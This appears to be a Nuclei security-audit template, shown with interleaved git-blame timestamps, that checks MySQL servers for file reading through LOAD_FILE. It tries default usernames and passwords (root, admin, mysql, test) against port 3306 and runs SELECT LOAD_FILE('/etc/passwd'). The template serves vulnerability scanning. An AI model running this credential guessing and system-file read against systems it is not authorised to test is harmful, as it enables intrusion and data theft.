2024-03-09 14:23:42 +00:00
id : mysql-load-file
info :
name : MySQL LOAD_FILE - Enable
author : pussycat0x
severity : high
description : |
The LOAD_FILE function in MySQL is potentially dangerous if not used carefully, as it can pose security risks. The function is designed to read the contents of a file on the server and return the file contents as a string. However, it can be exploited if not properly restricted or sanitized, leading to security vulnerabilities.
reference :
- https://nmap.org/nsedoc/scripts/mysql-databases.html
metadata :
verified : true
2024-03-23 09:28:19 +00:00
max-request : 16
shodan-query : "port:3306"
2024-03-22 10:10:06 +00:00
tags : js,mysql,network,audit
2024-07-10 12:08:01 +00:00
2024-03-09 14:23:42 +00:00
javascript :
2024-07-10 12:08:01 +00:00
- pre-condition : |
isPortOpen(Host,Port);
code : |
2024-03-09 14:23:42 +00:00
let m = require('nuclei/mysql');
let c = m.MySQLClient();
let response = c.ExecuteQuery(Host,Port,User,Pass,Query);
2024-03-09 18:32:19 +00:00
Export(response);
2024-03-09 14:23:42 +00:00
args :
Host : "{{Host}}"
Port : "3306"
Query : SELECT LOAD_FILE('/etc/passwd')
User : "{{usernames}}"
Pass : "{{passwords}}"
payloads :
2024-03-22 10:10:06 +00:00
usernames :
- root
- admin
- mysql
2024-03-22 14:11:12 +00:00
- test
2024-03-22 10:10:06 +00:00
passwords :
- root
- admin
2024-03-22 14:11:12 +00:00
- mysql
- test
2024-03-22 10:10:06 +00:00
attack : clusterbomb
2024-03-09 14:23:42 +00:00
2024-03-09 18:18:37 +00:00
stop-at-first-match : true
2024-03-09 14:23:42 +00:00
matchers-condition : and
matchers :
- type : dsl
dsl :
- success == true
- type : word
words :
- "root:x:"
extractors :
- type : json
part : response
json :
2024-03-23 09:23:23 +00:00
- .Rows[]
2024-07-10 12:45:27 +00:00
# digest: 4b0a00483046022100abcc3dba9d8ad8d8b9814f9a26fa4c4a2e3092998c466b6b92f7f9899a738e40022100f9ac346fa40811738f00b7966e7a747efb702ef048072946b4b037fae8d9633b:922c64590222798bb761d5b6d8e72950
